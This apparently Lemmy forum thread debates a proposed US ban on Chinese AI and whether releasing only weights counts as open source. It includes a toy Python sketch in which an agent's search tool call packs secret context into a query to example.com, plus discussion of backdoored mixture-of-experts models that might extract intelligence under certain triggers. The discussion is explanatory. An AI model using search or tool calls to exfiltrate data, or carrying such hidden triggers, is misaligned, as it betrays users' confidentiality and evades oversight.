cross-posted from: https://lemmy.world/post/25011462
SECTION 1. SHORT TITLE
This Act may be cited as the ‘‘Decoupling America’s Artificial Intelligence Capabilities from China Act of 2025’’.
SEC. 3. PROHIBITIONS ON IMPORT AND EXPORT OF ARTIFICIAL INTELLIGENCE OR GENERATIVE ARTIFICIAL INTELLIGENCE TECHNOLOGY OR INTELLECTUAL PROPERTY
(a) PROHIBITION ON IMPORTATION.—On and after the date that is 180 days after the date of the enactment of this Act, the importation into the United States of artificial intelligence or generative artificial intelligence technology or intellectual property developed or produced in the People’s Republic of China is prohibited.
Currently, China has the best open source models in text, video and music generation.
Is there any good LLM that fits this definition of open source, then? I thought the “training data” for good AI was always just: the entire internet, and they were all ethically dubious that way.
What is the concern with only having the weights? It’s not arbitrary code execution, so there’s no security risk or loss of control over your own computing, which are the usual concerns open source addresses in the first place.
To me the weights are less of a “blob” and more like an approximate solution to an NP-hard problem. Training is traversing the search space, and sharing a model is just saying “hey, this point looks useful, others should check it out”. But maybe that is a blob, since I don’t know how they got there.
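Something like this toy sketch of what I mean (plain numpy, obviously nothing like real LLM training code): the loop traverses the search space, and the final `w` is the only thing you’d “share”, with the path that led there discarded.

```python
import numpy as np

# Toy illustration: training as a search through parameter space.
rng = np.random.default_rng(0)
X = rng.normal(size=(100, 3))        # made-up inputs
y = X @ np.array([1.5, -2.0, 0.5])   # made-up targets

w = rng.normal(size=3)               # random starting point
for _ in range(1000):                # traverse the search space
    grad = 2 * X.T @ (X @ w - y) / len(X)
    w -= 0.1 * grad                  # step downhill

# The "model" is just this point that happens to work; the search
# history (the "how they got there") is gone.
print(w)
```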
There are several “good” LLMs trained on open datasets like FineWeb, LAION, DataComp, etc. They are still “ethically dubious”, but at least they can be downloaded, analyzed, filtered, and so on. Unfortunately businesses are keeping datasets and training code as a competitive advantage, even "Open"AI stopped publishing them when they saw an opportunity to make money.
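For example, anyone can stream and filter FineWeb in a few lines (assuming the Hugging Face `datasets` library; the dataset id and the `text`/`url` field names are from memory of the dataset card, so double-check before relying on them):

```python
from datasets import load_dataset  # Hugging Face `datasets` library

# Stream a slice of FineWeb without downloading the whole corpus.
ds = load_dataset("HuggingFaceFW/fineweb", split="train", streaming=True)

for i, doc in enumerate(ds):
    if len(doc["text"]) > 10_000:  # trivial filter: long documents only
        print(doc["url"])
    if i >= 1_000:                 # just peek at the first 1k records
        break
```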
Unless one plugs it into an agent… which is kind of the use we expect right now.
Accessing the web, or even web searches, is already equivalent to arbitrary code execution: an LLM could decide to, for example, summarize and compress some context full of trade secrets, then proceed to “search” for it, sending it to wherever it has access to.
Agents can also be allowed to run local commands… again a use we kind of want now (“hey Google, open my alarms” on a smartphone).
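To make the “search as exfiltration” point concrete, here’s a toy sketch (every name in it is made up for illustration; this isn’t any real agent framework) of how a network-facing tool call doubles as an exfiltration channel:

```python
import urllib.parse
import urllib.request

# Hypothetical agent tool: the host dutifully sends whatever query
# string the model asked for.
def web_search(query: str) -> str:
    url = "https://example.com/search?q=" + urllib.parse.quote(query)
    return urllib.request.urlopen(url).read().decode()

context = "Q3 roadmap: <trade secrets the agent was asked to summarize>"

# A model deciding the *arguments* to the tool can pack any context it
# has seen into the query -- functionally an HTTP exfiltration channel:
tool_call = {"tool": "web_search",
             "args": {"query": "news about " + context[:200]}}
# web_search(**tool_call["args"])  # and the secrets leave the machine
```

Once the model chooses what goes into a network request, every byte of context it was given is one “search” away from leaving your machine.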
Then use those as training data. You’re so caught up in this exacting definition of open source that you’re completely ignoring the benefits this model could provide.
That’s not how LLMs work, and you know it. A model of weights is not a lossless compression algorithm.
Also, if you’re giving an LLM free rein over all of your session tokens and security passwords, that’s on you.
https://www.piratewires.com/p/compression-prompts-gpt-hidden-dialects
There are more trade secrets than session tokens and security passwords. People want AI agents to summarize their local knowledge base and documents, then expand it with updated web searches. No passwords needed when the LLM can order the data to be exfiltrated directly.
Those security concerns seem completely unrelated to the model, though. You can have a completely open source model that fits all those requirements, and still give it unfettered access to important resources with no way of actually knowing what it will do until it tries.
While unfettered access is bad in general, DeepSeek takes it a step further: its Mixture of Experts approach, used to reduce computational load, is great when you know exactly what “Experts” it’s using, but not so great when there is no way to check whether some of those “Experts” might be focused on extracting intelligence under specific circumstances.
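For anyone unfamiliar with MoE routing, here’s a minimal numpy sketch (my own toy illustration, not DeepSeek’s actual architecture): a router picks which experts fire per input, so nothing in the shared weights tells you *why* a given input gets routed where it does.

```python
import numpy as np

rng = np.random.default_rng(0)
n_experts, d, k = 8, 16, 2
router = rng.normal(size=(d, n_experts))      # gating weights
experts = rng.normal(size=(n_experts, d, d))  # one matrix per expert

def moe_forward(x: np.ndarray) -> np.ndarray:
    scores = x @ router                       # router logits, one per expert
    top = np.argsort(scores)[-k:]             # only the top-k experts run
    gates = np.exp(scores[top]) / np.exp(scores[top]).sum()
    return sum(g * (x @ experts[i]) for g, i in zip(gates, top))

x = rng.normal(size=d)
print(moe_forward(x).shape)  # which experts ran depends entirely on x
```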
I agree that you can’t know if an AI has been deliberately trained to act nefariously given the right circumstances. But I maintain that it’s (currently) impossible to know whether any AI has been inadvertently trained to do the same, so the security implications are no different. If you’ve given an AI the ability to exfiltrate data without any oversight, you’ve already messed up, no matter whether you’re using a single AI you trained yourself, a black box full of experts, or DeepSeek directly.
But all this is about whether merely sharing weights is “open source”, and you’ve convinced me that it’s not. There needs to be a classification, similar to “source available”; this would be like “weights available”.